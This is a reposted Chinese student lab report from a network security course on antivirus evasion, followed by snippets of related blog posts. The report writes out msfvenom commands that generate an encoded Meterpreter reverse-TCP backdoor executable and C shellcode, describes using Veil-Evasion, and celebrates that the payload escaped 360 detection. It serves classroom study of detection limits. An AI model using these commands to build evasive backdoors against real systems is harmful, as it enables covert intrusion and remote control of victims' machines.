20155235 《网络攻防》 实验三 免杀原理与实践 实验报告

最新推荐文章于 2025-09-07 21:00:40 发布
最新推荐文章于 2025-09-07 21:00:40 发布
阅读量213 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: c/c++
原文链接:http://www.cnblogs.com/WYjingheng/p/8799620.html
本文详细记录了网络攻防实验过程,包括后门检测、编码器使用、C语言调用Shellcode等内容。实验中,作者利用多种工具和技术手段,如VirScan、Msfvenom、Veil-Evasion等,对恶意软件进行免杀处理并验证其效果。

20155235 《网络攻防》 实验三 免杀原理与实践 实验报告

实验目的

通过本部分内容的学习,认识到杀软局限性,提高在工作生活中对于恶意软件防范能力。

实验内容

(1)用VirScan来检测后门

(2)Msfvenom使用编码器

(3)Veil-Evasion

(4)C语言调用Shellcode

实验一 用VirScan来检测后门

按理说检查的应该是实验二生成的后门,但是,我用VirScan检验后门时,出现了一个让我意想不到的情况
dDMBAAAAAAAA&bo=PALcAAAAAAADB8A!&rf=viewer_4
让我十分的震惊了

任务二 Msfvenom使用编码器

重复编码,输入
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=[本机IP] LPORT=5235 -f exe > 5235Backdoor.exe
结果一样,内心崩溃。

任务三 Veil-Evasion

安装Veil-Evasion
因为我的虚拟机不能直接通过sudo apt-get install 安装,所以我参考了一下周泽堃同学第三次实验博客中关于Veil-Evasion的安装方法,然而,也失败了,最后经过了一番波折,我最终选择,拷贝了其他同学下好的Veil-Evasion。
使用Veil-Evasion
输入veil ,用use evasionlist payloads ,进入到payloads模板界面,经过一番操作后,成功生成
dDMBAAAAAAAA&bo=1ANDAgAAAAADN4Q!&rf=viewer_4

任务四 C语言调用Shellcode

输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=[kali IP] LPORT=5235 -f c 生成C语言代码,C语言代码就不贴了
回连监听
dPMAAAAAAAAA&bo=VgPgAQAAAAADN6Y!&rf=viewer_4
用 VirScan检测,结果为dAQBAAAAAAAA&bo=*gLxAAAAAAADFz8!&rf=viewer_4

经过5次重复编译后,用VirScan检测结果为
dAgBAAAAAAAA&bo=YQIfAQAAAAADF08!&rf=viewer_4

后记

实验成功真是可喜可贺,比较开心的是最后shellcode生成的C语言代码,无论是编译1次还是编译5次,奇虎360都没有检测出来,这让我无比的开心。但是我博客交的有些晚了,对不起老师!

转载于:https://www.cnblogs.com/WYjingheng/p/8799620.html

实验二木马分析(控制分析)实验实验冰河木马实验
qq_30600405的博客
10-31 1万+
木马分析(隐藏分析)实验 木马分析(控制分析)实验 木马植入方法实验---冰河木马
网络信息安全课程中的SQL注入实验报告 - 安全攻防实践解决方案
10-28
内容概要:本文介绍了2019-2020年度下学期网络信息安全课程的大作业实验报告。主要内容包括SQL注入攻击的目的、内容、环境搭建、五种SQL注入类型的攻击方式及其解决方案。报告详细阐述了如何通过搭建LAMP环境,在...
20155301实验 原理实践
weixin_33889665的博客
04-10 290
20155301实验 原理实践 实验内容 1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等工具或技巧; 2 通过组合应用各种技术实现恶意代码 3 用另一电脑实测,在软开启的情况下,可运行并回连成功,注明电脑的软名称版本 基础问题回答 1.软是如何检测出恶意代码的? 答: 对恶意代码的文件属性、编...
20155223 Exp3 原理实践 实验报告
bali9195的博客
04-07 145
20155223 Exp3 原理实践 实验报告 实验前准备 安装Veil-Evasion 直接使用Kali快速安装命令,拒绝采用git安装命令 apt-get -y install veil-evasion veil --setup 启动Veil 在生成的文档Veil里开启终端,输入命令veil。 之前没人告诉我,启动Veil是在生成的Veil文件夹里启动,而不是在外面直接输入命...
浅谈木马(一)
谢公子的博客
04-27 5770
技术全称为反毒技术Anti Anti- Virus(AV)简称“”,它指的是一种能使病毒木马于被毒软件查的技术。由于技术的涉猎面非常广,其中包含反汇编、逆向工程、系统漏洞等黑客技术。其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了毒软件的查。 在实际的渗透过程中,目标机器上一般会有毒软件。如Windows Defender、360安全卫士、腾讯电脑管家...
经验总结木马方法总结篇
快乐天使
01-02 1730
一.入口点加1法:1.用到工具PEditor2.特点:非常简单实用,但有时还会被卡巴查3.操作要点:用PEditor打开无壳木马程序,把原入口点加1即可 二.变化入口地址法:1.用到工具:OllyDbg,PEditor2.特点:操作也比较容易,而且效果比入口点加1点要佳.3.操作要点:用OD载入无壳的木马程序,把入口点的前二句移到零区域去执行,然后又跳回到入口点的下面第句继续执行...
20155304 网络攻防技术 实验 原理实践
04-11 198
20155304 网络攻防技术 实验 原理实践 实验内容 1.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等工具或技巧 使用上次实验产生的后门文件,放入老师提供的网址进行扫描,有48%的软报告病毒。 使用msf编码器 利用msfvenom -p java/meterpreter/revers...
20155201 网络攻防技术 实验 原理实践
weixin_30439131的博客
04-06 213
20155201 网络攻防技术 实验 原理实践 一、实践内容 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等工具或技巧 通过组合应用各种技术实现恶意代码 用另一电脑实测,在软开启的情况下,可运行并回连成功,注明电脑的软名称版本 二、报告内容: 1. 基础问题回答 1. 软是如何检测出恶意代码的...
网络系统攻防技术实验实验报告
04-15 2190
将未知代码的签名特征恶意代码库进行对比,搜索恶意代码库查找时候存在相匹配的恶意代码签名,若有吻合,则判定为恶意代码;反之则判断为正常代码。这种方法的思想是为病毒的特征设定一个阈值,扫描器分析文件时,当文件的总权值超出了设定值,就将其看作是恶意代码.这种方法主要的技术是要准确的定义类似病毒的特征,这依靠准确的模拟处理器。加壳的另一种常用的方式是在二进制的程序中植入一段代码,在运行的时候优先取得程序的控制权,之后再把控制权交还给原始代码,这样做的目的是为了隐藏程序真正的OEP(入口点,防止被破解)。
20145330 《网络攻防原理实践
angfoyi4419的博客
03-21 196
20145330 《网络攻防原理实践 一、基础问题回答 (1)软是如何检测出恶意代码的? 基于特征码的检测 特征码:一段特征码就是一段或多段数据。 如果一个可执行文件(或其他运行的库、脚本等)包含这样的数据则被认为是恶意代码。 启发式恶意软件检测 根据些片面特征去推断。 通用性,不精确。 基于行为的恶意软件检测 修改文件硬盘、连接恶意网站、修改注册表 (2)...
西南科技大学网络攻防对抗实验,ARP欺骗实验
06-02
**实验报告:ARP欺骗** **一、实验背景目的** ARP欺骗是一种网络攻击技术,它通过篡改网络数据链路层之间的映射关系,使得数据包被重定向到攻击者的设备上,从而实现监听、拦截甚至篡改网络通信的目的。本...
网络攻防实验报告.rar
07-29
网络攻防:深入理解实践网络攻防是一门深奥且充满挑战的学科,它涵盖了网络安全的多个方面,包括攻击手段、防御策略以及漏洞的分析利用。本篇将围绕“网络攻防实验报告”中的核心知识点展开详细讨论。 ...
网络攻防实验报告1
08-04
网络攻防实验报告1】 本实验旨在开发一个网络嗅探器,该工具主要用于分析TCP、UDP、ARP、IGMP和ICMP等不同类型的网络数据包。实验的主要目的是实现数据包的捕获、过滤、统计以及流量分析等功能,这对于网络安全...
网络攻防课程seed-labs实验-TCP_Attacks.zip
06-01
【TCP攻击实验】是网络攻防课程中的一个重要环节,它主要关注网络安全领域中的TCP协议漏洞和防御策略。...同时,实验报告的编写也是对学习成果的总结和展示,能提高学生的分析和表达能力,加深对TCP攻防技术的理解。
C++20格式化字符串:std::format的使用实践
软件开发领域中最需要你关注的博主!
09-07 368
C++20之前的主要字符串格式化方法包括printf、sstream和boost.format,它们各有优缺点:printf简单但类型不安全,sstream类型安全但语法繁琐,boost.format功能强大但需额外依赖。C++20引入的std::format整合了这些方法的优点,提供现代、安全且灵活的解决方案,支持多种数据类型、自定义格式和日期时间格式化,语法类似Python,显著提升了代码的可读性和维护性。
【C++】六个默认成员函数(下)
tangsl1552的博客
09-07 821
本文介绍了C++运算符重载的核心概念。运算符重载通过定义特殊函数(如operator+)为类类型对象赋予运算能力,需遵循特定规则:函数名以operator开头、必须包含类类型参数、不能改变内置运算符含义。重点讲解了流插入/提取运算符(<<、>>)的全局重载方法,需配合友元函数访问私有成员;详细分析了赋值运算符重载的参数传递、返回值优化和自赋值检查;区分了拷贝构造赋值重载的使用场景;还介绍了const成员函数对this指针的修饰作用,以及取地址运算符重载的注意事项。编译器会为未显式定
C++高阶八】哈希的应用—位图和布隆过滤器
2201_75570391的博客
09-04 1270
哈希最常用的应用是unordered系列的容器,但是当面对海量数据,如:如果要使用unordered_set来解决40亿个整数,一个整数占4四节,总共大约占16个G的内存空间,并且set容器中不止有整型数据还有其他的数据,所以需要另一种解决方法,而一个数在或不在可以用1/0来表示,也就是说只需要一个比特位就可以知道一个数在不在其中,于此诞生了位图位图就是用每一位来存放某种状态,适用于海量数据且数据无重复的场景,通常是用来判断某个数据存不存在的。
C++异常
如果这是最后一页 能否让我把故事重写
09-03 807
C++ 异常是程序运行时的意外事件,如除零、内存分配失败等。其机制可分离正常逻辑错误处理,通过 throw 抛出异常对象,由匹配的 catch 捕获。 抛出异常会生成对象拷贝,程序跳转至匹配 catch,沿途函数可能提前退出,局部对象会析构(栈展开),但堆上手动分配对象需智能指针避泄漏。 异常捕获需类型匹配,有派生类转基类等例外。main 函数宜用 catch (...) 作最后防线,可捕获所有异常但无法获取详情。还可通过 throw; 重新抛出异常。 C++11 的 noexcept 指定函数不抛异常
C++ 常见面试题汇总
最新发布
qq_36812406的博客
09-07 716
(按值)提供强异常安全?若拷贝失败,原对象不受影响。面试点:说明 UB 会让编译器基于假设做优化,从而产生难以预期的行为。面试点:区分 forwarding reference(模板。resize 可能触发移动还是拷贝(取决于元素是否可。预分配容量以避多次 realloc(均摊复杂度)。直接在容器末构造对象(避一次临时拷贝/移动)。容器复杂度迭代器失效规则(面试常问)。基本概念:定制内存分配策略(进阶题)。(见 Buffer 示例)面试点:能解释为什么对。、先构造新对象再替换。
网络攻防实验报告:Web_XSS_Elgg安全漏洞分析
而"readme"文件则通常包含实验的详细说明和要求,指导学习者如何操作和完成实验报告。 该实验不仅适用于学生作为课程作业来完成,同时对于那些希望提高自己Web安全知识的开发者而言,也是一个很好的实践机会。通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值